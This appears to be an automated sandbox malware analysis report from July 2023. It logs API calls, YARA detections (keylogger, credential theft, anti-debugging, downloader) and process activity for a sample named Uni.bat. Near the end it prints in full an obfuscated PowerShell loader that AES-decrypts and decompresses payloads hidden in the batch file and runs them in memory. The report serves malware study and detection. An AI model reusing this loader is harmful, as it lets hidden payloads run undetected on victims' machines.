NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050e9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ea000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050eb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ec000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ed000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ee000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x050ef000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05230000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05231000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05232000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05233000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 18, 2023, 6:28 p.m.	process_identifier: 1196 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05234000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk

Checks for the Locally Unique Identifier on the system for a suspicious privilege (1 event)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW July 18, 2023, 6:28 p.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (31 events)

description	Create a windows service	rule	Create_Service
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Communications over P2P network	rule	Network_P2P_Win
description	Communication using DGA	rule	Network_DGA
description	Steal credential	rule	local_credential_Steal
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Escalate priviledges	rule	Escalate_priviledges
description	PWS Memory	rule	Generic_PWS_Memory_Zero
description	Record Audio	rule	Sniff_Audio
description	Communications over HTTP	rule	Network_HTTP
description	Communications use DNS	rule	Network_DNS
description	Take ScreenShot	rule	ScreenShot
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	Communications over FTP	rule	Network_FTP
description	Run a KeyLogger	rule	KeyLogger
description	File Downloader	rule	Network_Downloader

Uses Windows utilities for basic Windows functionality (2 events)

cmdline

net session

cmdline

"Uni.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function oDKRN($UCbcn){ $EBBsx=[System.Security.Cryptography.Aes]::Create(); $EBBsx.Mode=[System.Security.Cryptography.CipherMode]::CBC; $EBBsx.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $EBBsx.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('jU/PZ5sGVHXe9eukENZ+EwRCKiahiZSWvpUTt8Zb8+E='); $EBBsx.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ub/nVYqjjldEJpQEkssoQQ=='); $RKtfb=$EBBsx.CreateDecryptor(); $return_var=$RKtfb.TransformFinalBlock($UCbcn, 0, $UCbcn.Length); $RKtfb.Dispose(); $EBBsx.Dispose(); $return_var;}function FeGSU($UCbcn){ $REgbO=New-Object System.IO.MemoryStream(,$UCbcn); $lpRdy=New-Object System.IO.MemoryStream; $NYxVA=New-Object System.IO.Compression.GZipStream($REgbO, [IO.Compression.CompressionMode]::Decompress); $NYxVA.CopyTo($lpRdy); $NYxVA.Dispose(); $REgbO.Dispose(); $lpRdy.Dispose(); $lpRdy.ToArray();}function aYwhj($UCbcn,$qsjlD){ $CQLXX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$UCbcn); $ROSPE=$CQLXX.EntryPoint; $ROSPE.Invoke($null, $qsjlD);}$wetzf=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\test22\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($CnUAr in $wetzf) { if ($CnUAr.StartsWith('SEROXEN')) { $aMomv=$CnUAr.Substring(7); break; }}$dMqwU=[string[]]$aMomv.Split('\');$IoPPi=FeGSU (oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[0])));$vOmrC=FeGSU (oDKRN ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($dMqwU[1])));aYwhj $vOmrC (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));aYwhj $IoPPi (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));

Uni.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All